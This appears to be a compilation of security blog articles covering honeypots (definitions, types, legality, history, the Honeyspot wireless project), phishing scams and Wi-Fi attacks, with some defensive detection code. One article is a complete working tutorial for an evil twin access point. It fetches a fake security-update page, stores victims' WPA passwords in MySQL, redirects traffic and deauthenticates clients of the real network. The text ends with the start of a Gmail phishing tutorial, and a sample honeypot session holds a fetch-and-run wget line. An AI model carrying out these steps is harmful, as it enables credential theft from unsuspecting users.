How can we Define a Honeypot?

 

How can we define honeypots?

A honeypot is, at bottom, a computer system: it has files, directories and services like any other, but it exists only to be attacked. Its purpose is to lure an attacker in so that his actions can be recorded and his behaviour studied. It is not a real production system but a decoy built for that purpose. What sets a honeypot apart from other security controls is breadth: a single honeypot can serve several security goals at once (detection, forensic evidence, knowledge of new threats), whereas a conventional control is usually a specific solution to one specific problem. For example, the log of malicious activity captured by a honeypot allows a compromise to be reconstructed after the fact, and a honeypot placed in a network can reveal new threats early enough for the organization to respond to them.

 

To an outside attacker a well-built honeypot is indistinguishable from a real production server, so the attacker behaves no differently against it. The security team, however, can monitor the honeypot, record the attacks and analyse them later. A honeypot can also absorb attacks that would otherwise be directed at the real server. Note that indistinguishability is the goal, not a guarantee; the problems section below discusses what happens when an attacker recognizes the trap.

 

What is the motivation behind a honeypot?

Interest in honeypots grows out of interest in computer security generally. Running one requires understanding how security systems work, how an organization is actually protected, and how a single flaw can put the whole system and organization at risk. A network administrator should expect a lot of work before a honeypot goes into a network: knowing the system and network architecture, and the changes the honeypot will require, is a crucial first step. The honeypot's output is examined with reliable forensic tools. Problems will surface along the way, and the administrator should be able to solve them before the honeypot is put into the system; working through them in advance means that later, under the pressure of a real incident, the system can be handled quickly and losses recovered. Good knowledge of security analysis and of forensic techniques is therefore a must.

 

What should be done before applying a honeypot to the real production system?

A network administrator should do some research as soon as he considers deploying a honeypot in the network. He has to be sure the honeypot is contained, with no path from it into the real systems; otherwise it becomes a liability rather than a control. He also has to make sure the attacker cannot tell that he is in a honeypot, and must know exactly how much information the honeypot exposes to an attacker. It is also worth knowing how an attacker behaves once he realizes he is in a trap: does he simply give up and stop? Finally, the administrator needs to decide where in the network the honeypot should be placed and how much information that placement can yield.

Laws play a role here as well. A network administrator should be aware of the restrictions on running honeypots, especially if the organization is in the European Union (EU) or the United States of America (USA), where rules and regulations govern the collection of information about an attacker and attempts to trace him. The administrator should abide by these rules, for instance by not tracking the attacker beyond what the law permits, and respect the applicable laws in every respect.

What is the description of our problem?

When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control of the intentional flaws left there. Once we start tracing the attacker, however, it is not guaranteed that we remain the ones in control. So the security of a honeypot is itself uncertain: we do not know whether the attacker realizes that the system is fake, nor whether he appreciates how valuable information about the system's flaws is.

We therefore need to be precise about the limits an attacker actually has once he controls the honeypot. It would be a failure if the attacker could exploit the honeypot itself, seize a flaw in it, and use it as a stepping stone into the real system; at that point the entire system is compromised. Another problem is that an attacker may recognize the trap and either stop or merely pretend to keep attacking. From then on the honeypot yields nothing, and running forensic tools over it is no longer useful either.

A key part of using honeypots is being sure of the answers to these questions, hardening the honeypot, and making certain that compromising it gives the attacker no useful information about the real system. A good network administrator plays the hacker on one occasion and the forensic examiner on another, or does both at once with his team. The accuracy of the results then depends on the tools used for attack and for forensics.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

What are the Types of Honeypots?

 

A honeypot is a computer system with files and directories like any other, set up to lure an attacker into a trap so that his actions can be investigated and his behaviour followed. It is not a real production system but a decoy built intentionally for that purpose.

 What are the types of honeypots?

 

Honeypots are usually grouped by purpose into two main types, research honeypots and production honeypots; a second, independent axis is the level of interaction (low or high) they offer an attacker:

  1. Research honeypots:

Research honeypots are run mainly by military, government and research organizations. They capture a large volume of data and are used to learn about new threats and about the motives and tools of black-hat attackers. Their value lies in understanding how attacks work and how systems in general could be made more secure; they do not directly reduce the risk of the organization that runs them, since they are not tied to its particular systems and vulnerabilities.

  2. Production honeypots:

These honeypots are used to make an organization better protected against attacks. They are deployed inside the organization's own production network, and their goal is to raise the organization's overall security.

Production honeypots typically capture a limited amount of data, which is why low-interaction honeypots are generally used for this role. The attacker's behaviour is monitored closely with forensic tools so that risks can be lowered and the organization made more secure. These are the honeypots most used in practice, yet they can themselves pose a risk to the organization.

What matters most with production honeypots is where and how the network administrator deploys them. Remember that they sit inside a real network and system, and testing them often produces unexpected behaviour and problems.

Consequently, other systems inside the organization may be endangered by a honeypot in the network. The administrator must be aware that those systems could be abused through the honeypot, and must make sure that every other system remains adequately secured after the honeypot is deployed; otherwise the whole organization eventually faces a serious problem.

How to categorize honeypots according to the type of data collection?

Honeypots can also be classified by the kind of data they collect about an attack. A honeypot can be set up to detect and record one or more of: events (anything that happens and changes something in the honeypot), attacks (attempts by a malicious user to exploit a vulnerability), and intrusions (successful attacks that penetrate the honeypot). No category is inherently more important than another; most honeypots record something in each, and all three matter to a security administrator who wants to understand an attack and the vulnerabilities of a system.
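The definition given earlier and the three data categories just listed can be made concrete with a minimal low-interaction honeypot. The following is an added example, not code from the original page: a fake telnet-style login service that records every input as an event, every credential or exploit attempt as an attack, and a successful login with the decoy's deliberately accepted credentials as an intrusion. The banner, the decoy credentials, the exploit markers and the sample attacker session are all constructed for the example. The decoy never executes anything the attacker types; it only answers with canned prompts, which is what keeps it from becoming a foothold into the real network.

```python
"""Minimal low-interaction honeypot: a fake telnet-style login that records
everything it sees and labels each record as an event, an attack or an
intrusion. Added example; the banner, decoy credentials, exploit markers and
sample session are constructed and not taken from the original page."""
import json
import socket
import time
from dataclasses import dataclass, asdict

BANNER = b"Ubuntu 18.04 LTS\r\nlogin: "
# Credentials the decoy deliberately accepts (assumed). Nothing real uses
# them, so a successful login is by definition an intrusion into the decoy.
DECOY_CREDS = {("root", "toor"), ("admin", "admin")}
# Substrings marking a deliberate exploit attempt rather than a plain probe.
EXPLOIT_MARKERS = ("/bin/sh", "wget ", "curl ", "chmod +x", "../")


@dataclass
class Record:
    ts: float
    kind: str      # "event" | "attack" | "intrusion"
    detail: str
    src: str


class Honeypot:
    """State for one attacker session; feed() never executes attacker input."""

    def __init__(self, src="local"):
        self.src = src
        self.records = []
        self.user = None
        self.logged_in = False

    def _log(self, kind, detail):
        self.records.append(Record(time.time(), kind, detail, self.src))

    def feed(self, line):
        """Consume one attacker line and return the bytes the decoy answers."""
        line = line.rstrip("\r\n")
        self._log("event", f"input {line!r}")          # every input is an event
        if self.logged_in:
            if any(m in line for m in EXPLOIT_MARKERS):
                self._log("attack", f"post-login exploit attempt {line!r}")
            return b"$ "                                # pretend shell, runs nothing
        if self.user is None:
            self.user = line
            return b"Password: "
        self._log("attack", f"login attempt for user {self.user!r}")
        if (self.user, line) in DECOY_CREDS:
            self.logged_in = True
            self._log("intrusion", f"decoy credentials accepted for {self.user!r}")
            return b"Welcome\r\n$ "
        self.user = None
        return b"Login incorrect\r\nlogin: "

    def summary(self):
        counts = {"event": 0, "attack": 0, "intrusion": 0}
        for r in self.records:
            counts[r.kind] += 1
        return counts

    def export(self):
        """One JSON object per record, ready to ship to a log collector."""
        return "\n".join(json.dumps(asdict(r)) for r in self.records)


def run_transcript(lines, src="constructed"):
    """Replay a session offline; returns the honeypot and its replies."""
    hp = Honeypot(src)
    replies = [hp.feed(line) for line in lines]
    return hp, replies


def serve(host="0.0.0.0", port=2323):
    """Real listener. One connection at a time is enough for a decoy."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen()
        while True:
            conn, addr = srv.accept()
            with conn:
                hp = Honeypot(f"{addr[0]}:{addr[1]}")
                conn.sendall(BANNER)
                for line in conn.makefile("r", encoding="utf-8", errors="replace"):
                    conn.sendall(hp.feed(line))
                print(hp.export())


# Constructed attacker session: a failed guess, a decoy login, then an attempt
# to fetch and run a payload (203.0.113.9 is a documentation address).
SAMPLE_SESSION = [
    "pi", "raspberry",
    "root", "toor",
    "wget http://203.0.113.9/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x",
]

if __name__ == "__main__":
    hp, _ = run_transcript(SAMPLE_SESSION)
    print(hp.export())
    print(hp.summary())
```

serve() binds a real port (2323 by default, so it runs without root) and handles one connection at a time; run_transcript() replays a captured or constructed session offline. Records are emitted as JSON lines, one per event, which is the form a log collector or SIEM would ingest. Replaying SAMPLE_SESSION yields five events, three attacks and one intrusion.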

 

Is the usage of honeypots considered legal or not?

There are legal issues to be aware of before deploying a honeypot in an organization's network. They vary with the governing rules and with the country in which the honeypot is deployed and configured. The regulations cover many aspects, but chiefly three: the security of the data, the collection of the data, and the way honeypots are used in the organization.

The applicable law depends heavily on the kind of data the honeypot captures and on who deploys it. The central question for the legality of a honeypot is what data is collected, what it contains, and what it is to be used for afterwards, which makes a general answer impossible. That leaves several steps to consider carefully before deploying a honeypot in the network.

Many questions should be asked during the experiment as well. Running a honeypot at home or in a company raises the same questions, but in a company the network administrator carries additional responsibilities: he answers both to the law of the country and to the company's own policies.

Abiding by these rules is necessary to stay within the law. Some companies allow almost any experiment internally; many more restrict such experiments. Before a honeypot is deployed, its legality within both the company and the country must be settled, which means asking the responsible people whether the planned deployment violates any rule set by either. Three legal issues in particular are raised by honeypots: privacy, entrapment and civil liability.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

 


 


How can you Create an Evil Twin Access Point?

 

Quick introduction:

What is an evil twin access point? The name comes up constantly in Wi-Fi security. The idea is simple: an attacker imitates a legitimate Wi-Fi access point in order to collect data from whoever connects to the impostor.

The attacker sets up an access point with the same name (ESSID) and settings as the legitimate one and positions it close to the impersonated access point. From the user's point of view the two are identical twins: the user cannot tell them apart and connects to the evil access point as if it were the original, because the signal strengths are similar or, often, the evil twin's signal is the stronger one.

There are then two cases: the user's device connects automatically to the access point, which in this scenario is the evil twin, or the user manually picks the access point with the stronger signal, taking it for the nearer one. In both cases the attacker sits between the user and the network: he can observe the user's traffic and, as in the procedure below, present a fake page that asks for sensitive data such as the Wi-Fi password.

What do you need to set up an evil twin access point?

To set up an evil twin access point you need four things:

  1. A machine running Kali Linux.
  2. A wireless adapter that supports monitor mode and packet injection (airbase-ng and mdk3 depend on both).
  3. An Internet connection on the Kali machine (a wired one, in this tutorial).
  4. A target access point.

What are the steps to accomplish the desired task?

The following steps prepare an evil twin access point for the attack:

  1. Boot your Kali Linux machine and log in.
  2. Make sure the machine has a working Internet connection on its wired interface; clients of the evil twin will be routed through it.
  3. Install the DHCP server: open a terminal and type apt-get install isc-dhcp-server (older Kali releases shipped this package as dhcp3-server, the name used by the original tutorial).
  4. After the installation completes, create the DHCP configuration with:

nano /etc/dhcpd.conf

An empty file opens in the editor (note the space between nano and the path).

  5. Type the following lines into the empty file exactly as shown:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  6. Save the file with Ctrl+X, then y, then Enter.
  7. Download the fake security update page; it is what the victim sees on opening a browser. Change to the web root first:

cd /var/www

On recent Kali releases Apache serves /var/www/html rather than /var/www; check DocumentRoot in /etc/apache2/sites-enabled/000-default.conf and use that directory.

  8. In that directory, run the following commands in order (they replace the default page with the downloaded fake one):

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  9. Start the Apache web server and MySQL:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  10. Create a database to store the WPA/WPA2 passwords that victims type into the security update page:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Leave the MySQL terminal open; it is needed again in step 16.

  11. Find the name of the wired interface and its local IP address, and put the wireless adapter into monitor mode. Open a new terminal and type:

ip route

airmon-ng

airmon-ng start wlan0

clear

In the output of ip route, the wired interface is the name after "dev" (typically eth0) and the local IP is the address after "src"; note both, they are needed below. airmon-ng lists the wireless interfaces, and airmon-ng start wlan0 puts wlan0 into monitor mode. The tutorial assumes the monitor interface is named mon0; recent versions of aircrack-ng name it wlan0mon instead, so substitute whichever name airmon-ng reports in the remaining commands.

  12. Update the OUI database, survey the nearby networks and start the fake access point:

airodump-ng-oui-update

airodump-ng -M mon0

airbase-ng -e [ESSID] -c [ch. #] -P mon0

Note the target's ESSID, BSSID and channel number from the airodump-ng listing (stop it with Ctrl+C), then supply the ESSID and channel to airbase-ng. Leave the airbase-ng terminal running; it reports clients as they associate.

  13. The evil twin is now broadcasting. airbase-ng created a tunnel interface, at0, that carries the traffic of clients connected to the fake access point; it must be given an address and routed to the wired interface. Open another terminal, leaving the MySQL and airbase-ng terminals running, and type:

ifconfig at0 192.168.1.129 netmask 255.255.255.128 up

  14. Add a route for the fake subnet, enable IP forwarding and NAT so that clients of the evil twin reach the Internet through the wired interface, redirect their HTTP traffic to the local web server, and start the DHCP server on at0. Type the following commands in order (replace [LOCAL IP ADDRESS] with the address noted in step 11; the long options take two leading hyphens):

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE

iptables --append FORWARD --in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [LOCAL IP ADDRESS]:80

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

The last command runs dhcpd directly against the configuration written in step 5. The original tutorial additionally starts the packaged service with /etc/init.d/isc-dhcp-server start; that service reads its own configuration from /etc/dhcp/dhcpd.conf and is not needed once dhcpd is already running on at0.

  15. Deauthenticate the clients of the real access point so that they reconnect, ideally to the evil twin. First create a blacklist file containing the target's BSSID, then run mdk3 in deauthentication mode against it:

echo [BSSID] > blacklist

mdk3 mon0 d -b blacklist -c [CH.#]

Here [BSSID] is the BSSID and [CH.#] the channel of the target noted in step 12. Whether a deauthenticated client lands on the fake access point is not guaranteed: the airbase-ng network above is open, and most client operating systems will not automatically rejoin a saved WPA/WPA2 network that now appears without encryption, so the user may have to select it by hand.

  16. Watch the airbase-ng terminal: it shows when a client associates with the evil twin. Once a victim has submitted the fake security update page, switch to the MySQL terminal and query the table:

use evil_twin

select * from wpa_keys;

The query prints the password the victim entered, as stored in the MySQL database.

  17. Done: the evil twin access point is set up and collecting what victims type into the fake page.
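The defensive counterpart of the procedure above is spotting an evil twin from the air. The following is an added example, not part of the original tutorial: it reads access-point records in the shape of an airodump-ng CSV export (reduced here to five columns, with constructed values) and flags any BSSID that advertises one of the organization's ESSIDs but is not in an assumed inventory of owned BSSIDs, noting the traits the airbase-ng setup leaves behind: same channel as the real access point, encryption dropped to open, and a stronger signal. A real airodump-ng CSV has more columns and a second table of clients; trim it to these columns before feeding it in.

```python
"""Evil-twin detection over airodump-ng style access-point records.

Added example, the defensive counterpart of the procedure above; it is not
part of the original tutorial. The CSV text is constructed: it keeps five of
the columns of an airodump-ng CSV export (BSSID, channel, privacy, ESSID,
power) with made-up values. The inventory of authorized BSSIDs is assumed."""
import csv
import io
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # "WPA2", "OPN", ...
    essid: str
    power: int     # dBm; closer to 0 means stronger


SAMPLE_CSV = """\
BSSID,channel,privacy,ESSID,power
AA:BB:CC:00:00:01,6,WPA2,CorpWiFi,-61
02:11:22:33:44:55,6,OPN,CorpWiFi,-38
DE:AD:BE:EF:00:10,11,WPA2,GuestNet,-70
"""

# Assumed inventory: the BSSIDs the organisation really owns, per ESSID.
AUTHORIZED = {
    "CorpWiFi": {"AA:BB:CC:00:00:01"},
    "GuestNet": {"DE:AD:BE:EF:00:10"},
}


def parse_aps(text):
    """Parse the reduced CSV into AccessPoint records (BSSIDs upper-cased)."""
    aps = []
    for row in csv.DictReader(io.StringIO(text)):
        aps.append(AccessPoint(
            bssid=row["BSSID"].strip().upper(),
            channel=int(row["channel"]),
            privacy=row["privacy"].strip(),
            essid=row["ESSID"].strip(),
            power=int(row["power"]),
        ))
    return aps


def find_evil_twins(aps, authorized):
    """Return (bssid, essid, reasons) for every AP that advertises one of our
    ESSIDs from a BSSID we do not own.

    The reasons note the traits of the airbase-ng setup above when present:
    same channel as the real AP, encryption dropped to open, stronger signal.
    ESSIDs not in the inventory are ignored; they are someone else's network.
    """
    by_essid = {}
    for ap in aps:
        by_essid.setdefault(ap.essid, []).append(ap)

    alerts = []
    for essid, own_bssids in authorized.items():
        seen = by_essid.get(essid, [])
        genuine = [ap for ap in seen if ap.bssid in own_bssids]
        for ap in seen:
            if ap.bssid in own_bssids:
                continue
            reasons = ["unknown BSSID"]
            for ref in genuine[:1]:          # compare against the first real AP seen
                if ap.privacy != ref.privacy:
                    reasons.append(f"privacy {ref.privacy}->{ap.privacy}")
                if ap.power > ref.power:
                    reasons.append("stronger signal than authorized AP")
                if ap.channel == ref.channel:
                    reasons.append("same channel as authorized AP")
            alerts.append((ap.bssid, essid, reasons))
    return alerts


if __name__ == "__main__":
    for bssid, essid, reasons in find_evil_twins(parse_aps(SAMPLE_CSV), AUTHORIZED):
        print(f"possible evil twin of {essid}: {bssid} ({', '.join(reasons)})")
```

On the constructed sample the clone 02:11:22:33:44:55 is reported with all four reasons, while GuestNet, seen only from its own BSSID, produces nothing. Matching on ESSID alone is deliberate: an attacker can copy the ESSID and channel but, unless he also spoofs the BSSID, not the inventory.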

 

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

How to understand phishing scams?

 

So, what about phishing scams?

Phishing is one of the most common social engineering attacks in use today.

The following list describes a few social engineering scams carried out through phishing:

  1. Banking Link Scam:

An email is sent to trick you into revealing important information about yourself. It may carry a phony link to your bank, styled so that you believe the message came from your actual bank, and you are tempted to enter your username and password. In 2015, Kaspersky reported that a campaign named Carbanak had stolen about a billion dollars from banks in some 30 countries.

Carbanak relied heavily on spear phishing: employees infected their own workstations, after which the attackers tunnelled deeper into the banks' systems and took control of employee machines. That allowed them to transfer cash, operate ATMs remotely, alter account details and play other tricks on accounts.

The starting point was a phishing email sent to employees, made to look as if a colleague had sent it but carrying malicious code that spread from there. The attackers then recorded everything that happened on the victims' machines for later use. When the time came they understood the system well enough to know what went where, which made transactions such as the ATM cash-outs easy. They also inflated balances and siphoned off the difference: a customer's balance might go from $20,000 to $100,000, with the extra $80,000 being the attackers' take.

 

  2. Fax Notice Scam:

This one is nothing more than a phony link to a phony fax, but the damage to your computer when it lands is large. The scam shows up mainly at companies that rely on faxes: document management firms, title companies, and insurance and other financial services companies.

 

  3. Dropbox Link Scam:

Even Dropbox has its share of scams. Several incidents occurred during 2014. In one, a phishing email asked victims to click a fake link to reset their Dropbox password; the link led to a page claiming the browser was out of date, with a button to run the update. Pressing it triggered a Trojan from the Zeus family of malware. In another, emails carrying what appeared to be Dropbox links delivered malware such as the CryptoWall ransomware when clicked.

 

  4. Court Secretary Complaint Link Scam:

Another phony link, this one posing as confirmation of a complaint the recipient supposedly filed. The email may suggest that the consumer is about to complain about something, with the sender pretending to want details of the problem in order to work on it. This kind of phishing was very common for some time.

 

  5. Facebook Message Link Scam:

This trick surfaces when a celebrity dies. A link is sent through Messenger or shared on various pages, promising exclusive content about the death in exchange for a click.

A vivid example followed the death of Robin Williams. A phishing message spread widely among Facebook users, tempting them to open a link to a Robin Williams goodbye video; the title even claimed it was an exclusive video of Williams saying goodbye on his cell phone. Clicking the link took the user to a bogus BBC page containing nothing but bad links leading to scam online surveys.

How is it possible for an attacker to attract more victims to the counterfeit website?

An attacker has many ways to draw victims to the fake website. Among them are these four:

  1. The attacker shortens the phishing URL with a link-shortening service, hiding the real destination.
  2. The URL is shared widely through messaging apps and social networks such as WhatsApp and Viber, where people are more likely to follow such links because security awareness is not shared across the group.
  3. Social engineering is used so that people are inclined to open the links.
  4. The attackers email the URLs to victims, often under female sender names.

 

Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack

Hacking GMail Using Phishing Method and Prevention

 

What is the History of Honeypots?

 

Researchers and developers can protect the software they write in several ways. Some are proactive, like code review and regression testing; others are reactive, like the Pwn2Own contest, where new vulnerabilities are used to exploit browsers. Some tools have aspects of both, and honeypots are one such class. The term honeypot was first presented by Lance Spitzner in 1999 in a paper titled To Build a Honeypot.

 

What is the history of honeypots?

The name comes from the honeypot of everyday life: a pot full of something desirable, such as honey for a child or for a nest of ants, which is useful for luring the target out. Computer honeypots work the same way. A tempting target is put in place, and an attacker who finds it is drawn to exploit it and carry out his attack there.

Spitzner's paper popularized the word in computer security, but the idea goes back to the mid-1980s, and there has been research since then on how attacks on systems unfold and what damage they do to organizations. One of the earliest well-documented cases is Bill Cheswick's, at AT&T Bell Laboratories. In January 1991 he was trying to work out, from his logs, what an intruder was after, as he later described:

On Sunday evening, January 20, I was riveted to CNN like most people. A CNN bureau chief in Jerusalem was casting about for a gas mask. I was quite annoyed when my terminal announced a security event:

22:33 finger attempt on berferd

A couple of minutes later someone used the debug command to submit commands to be executed as root – he wanted our mailer to change our password file!

These lines show that Cheswick could read every command the remote attacker issued. That same evening he began stringing the attacker along by hand, replying with doctored responses. The next day he and his colleagues built a chroot environment in which the attacker could be let loose and watched. In his words:

I wanted to watch the cracker’s keystrokes, to trace him, learn his techniques, and warn his victims. The best solution was to lure him to a sacrificial machine and tap the connection. … We constructed such a chroot “Jail” (or “roach motel”) and rigged up logged connections to it through our firewall machine. … A little later Berferd [the attacker] discovered the Jail and rattled around in it. He looked for some programs that we later learned contained his favorite security holes. To us, the Jail was not very convincing, but Berferd seemed to shrug it off as part of the strangeness of our gateway. Berferd spent a lot of time in our Jail …

Cheswick tracked the attacker for several months, keeping him inside the jail until it was finally shut down. During that time the attacker tried to break into a number of other networks, and the value of the exercise was that administrators learned exactly where their networks could be attacked. Without the honeypot, Cheswick and the administrators he worked with would not have found those weaknesses, nor would they have traced the attacks to their source: an intruder in Sweden with a knack for subverting whatever system he was on, operating from an account on one of those systems.

In 1997 Fred Cohen released version 0.1 of the Deception Toolkit, which served as an introduction to what a honeypot should look like. The next year CyberCop Sting was released as the first commercial honeypot, and in the same year BackOfficer Friendly appeared: free, easy to install and configure, and running on Microsoft Windows, which put a honeypot within reach of a large number of people for the first time and did much to publicize the idea. The Honeynet Project followed in 1999, after BackOfficer Friendly had drawn people to the new approach, and a series of papers discussing the technology and more efficient implementations spread the knowledge further.

Between 2000 and 2001 honeypots began to be used to capture malicious software in the wild, to detect it and to raise the alarm about new threats. From then on they became popular with organizations that took security seriously, which deployed them in their networks to detect malicious traffic and improve network security as a whole. Since 2002 the concept has been familiar to security professionals; researchers and practitioners have kept extending what honeypots can do, to the point where their value to businesses is considerable.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 


What is Honeyspot?

 

What are Wireless Honeypots?

Wireless honeypots are another commonly used type. A wireless honeypot is deployed to capture the behavior of systems and attackers inside a wireless network, and it yields information and statistics about that activity. "Wireless" here covers IEEE 802.11 (Wi-Fi) as well as related technologies such as Bluetooth.

Why do we use Wi-Fi honeypots?

We use Wi-Fi honeypots to track malicious activity against a wireless network. A few access points, a wired segment behind them and some deliberately exposed computers are enough to build one. Wi-Fi networks are vulnerable to a wide range of attacks, so such a honeypot can capture unauthorized traffic and answer questions such as whether wardrivers and attackers are probing the network or preparing to compromise it.

 

What is Honeyspot? 

Honeyspot is the name of a wireless honeypot project originally supported by the Spanish chapter of the Honeynet Project, and it is the best-known wireless honeypot project. The name combines honeypot, the underlying idea, with hotspot, the usual name for a public wireless access point.

The rationale behind Honeyspot is to monitor an attacker while he acts against a wireless network, so that his behavior and actions become known. Since no legitimate user has any business on it, all traffic it sees beyond that of its own decoy clients is suspect by definition. As with any honeypot, an experienced attacker may be able to tell a real system from a fake one, and Honeyspot is no exception; how it presents itself therefore matters, and it must resemble a real wireless network closely enough to convince most attackers.

The team's aim was to understand the types of attack, the attacker's assumptions about the system, his reasoning and the way he approaches it. Each attack is recorded in enough detail to identify it fully and to prevent similar attacks later. The collected data makes the weaknesses of WEP-protected networks concrete, along with how attackers think about and exploit them; IP address spoofing, session hijacking and MAC address spoofing can all be recognized and identified with Honeyspot, as can the specific techniques used to attack the clients of a wireless network. The outcome is a better understanding, and therefore more secure systems.

A particular network architecture works best with Honeyspot.

It consists of the following components:

  1. A Wi-Fi access point (WAP) to which clients connect, and to which an attacker can connect as well. It is the network's route to the internet for all of its clients.
  2. Wireless clients (WC), which appear to be ordinary users of the network going through the WAP to reach the internet. None of them is a real user's device; they are decoys that connect to the honeyspot. Their purpose is to generate traffic: the attacker, monitoring the network with his own tools before striking, sees inbound and outbound traffic on the honeyspot and concludes that he is looking at a real system rather than a fake one, which tempts him to attack it.
  3. A wireless monitor module (WMON), which captures traffic so that information about it can be retrieved and examined. This is what lets the security administrators understand the attacks, so it is a central part of the design.
  4. A wireless data analysis module (WDA), which depends on WMON: WMON captures the traffic records and stores them, then passes them to WDA, which analyzes them and extracts the information the administrators need. Capture and analysis are thus split between the two modules.
  5. A wired module (WI), which is optional: the design works with or without it. The honeyspot may be given a wired segment in addition to the wireless one, which gives the network a slightly different shape from the usual honeyspot layout without changing how it operates.
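How the WMON/WDA split works in practice, as an added example that is not code from the Honeyspot project (neither of the sources below includes any): WMON is stood in for by a constructed list of captured frames, and WDA is a function that looks for three of the attacks this section mentions, a deauthentication flood against the decoy clients, an attacker borrowing a decoy's MAC address (spotted by the 802.11 sequence-number discontinuity), and an outside station using the access point. The MAC addresses, thresholds and the capture itself are all assumptions for illustration.

```python
"""Toy WMON/WDA pipeline for a Honeyspot-style wireless honeypot.

This is an added illustration, not code from the Honeyspot project. WMON is
reduced to a list of already-captured frames (constructed below); a real
monitor would read them from a monitor-mode interface. WDA is analyze().
"""
from collections import deque
from dataclasses import dataclass

# Locally administered MAC addresses, constructed for this example.
AP = "02:00:00:00:aa:01"            # the honeyspot's access point (WAP)
C1 = "02:00:00:00:c1:01"            # scripted decoy clients (WC) that make the
C2 = "02:00:00:00:c1:02"            # network look used
FAKE_CLIENTS = {C1, C2}
EVIL = "02:00:00:00:ee:ee"          # an outside station, i.e. the attacker
BCAST = "ff:ff:ff:ff:ff:ff"

SEQ_MODULUS = 4096                  # 802.11 sequence numbers are 12 bits wide
MAX_SEQ_GAP = 64                    # a bigger jump from one MAC means a second radio is using it


@dataclass
class Frame:
    ts: float       # capture time in seconds
    kind: str       # "probe", "assoc", "data" or "deauth"
    src: str        # transmitter address
    dst: str        # receiver address
    seq: int        # 802.11 sequence number


def analyze(frames, deauth_threshold=5, window=2.0):
    """WDA: return (kind, station, ts) alerts, at most one per (kind, station)."""
    alerts = []
    flagged = set()
    last_seq = {}        # src -> last sequence number seen from it
    deauths = {}         # src -> timestamps of its recent deauth frames

    def alert(kind, station, ts):
        if (kind, station) not in flagged:
            flagged.add((kind, station))
            alerts.append((kind, station, ts))

    for f in sorted(frames, key=lambda fr: fr.ts):
        # 1. MAC spoofing. A station numbers its frames consecutively (mod 4096);
        #    an attacker cloning its MAC from another radio cannot keep in step.
        #    A gap of 0 is just a retransmission and is not flagged.
        if f.src in last_seq:
            gap = (f.seq - last_seq[f.src]) % SEQ_MODULUS
            if gap > MAX_SEQ_GAP:
                alert("mac_spoof", f.src, f.ts)
        last_seq[f.src] = f.seq

        # 2. Deauthentication flood: a burst of deauth frames, usually forged with
        #    the AP's own address, used to kick clients off the network.
        if f.kind == "deauth":
            recent = deauths.setdefault(f.src, deque())
            recent.append(f.ts)
            while f.ts - recent[0] > window:
                recent.popleft()
            if len(recent) >= deauth_threshold:
                alert("deauth_flood", f.src, f.ts)

        # 3. Unauthorized station: only our decoys should associate with, or send
        #    data through, the honeyspot. Probe requests are ordinary scanning.
        if f.kind in ("assoc", "data") and f.src not in FAKE_CLIENTS and f.src != AP:
            alert("unauthorized_station", f.src, f.ts)

    return alerts


# Constructed capture: decoy traffic, then an attacker who deauthenticates C1,
# takes over its MAC address and finally joins under his own address.
CAPTURE = [
    Frame(0.00, "data",  C1, AP, 100),
    Frame(0.10, "data",  C2, AP, 10),
    Frame(0.20, "data",  C1, AP, 101),
    Frame(0.30, "data",  C1, AP, 101),      # retransmission: same seq, not spoofing
    Frame(0.40, "data",  C2, AP, 11),
    Frame(1.00, "probe", EVIL, BCAST, 1),
    *[Frame(1.5 + i * 0.05, "deauth", AP, C1, 200 + i) for i in range(6)],
    Frame(2.00, "data",  C1, AP, 3000),     # C1's MAC, but the sequence number jumped
    Frame(2.10, "assoc", EVIL, AP, 2),
    Frame(2.20, "data",  EVIL, AP, 3),
]

if __name__ == "__main__":
    for kind, station, ts in analyze(CAPTURE):
        print(f"t={ts:5.2f}  {kind:22s} {station}")
```

Run on the constructed capture it reports the deauth flood (attributed to the AP's address, which is what the forged frames claim), the MAC spoof of C1 and the unauthorized station, in that order. The decoy traffic alone produces nothing, which is the property a honeyspot relies on: because the operator scripts every legitimate frame, anything else is an event worth recording.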

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

 

How to Hack Gmail using Phishing Method

 

The key to the question in this article's title is Wapka, a free website-building platform. With it a phishing page can be created without much knowledge of PHP or MySQL, and the victim's Gmail ID, password, browser and IP address are all forwarded to the attacker.

 

What do I have to get before getting into the steps?

Before starting the steps discussed later in this article, you need the following:

1. An email account, to register on Wapka.

2. Some knowledge of HTML.

3. Some familiarity with Gmail.

4. Some familiarity with building websites.

5. A victim to target.

 

What are we about to do now?

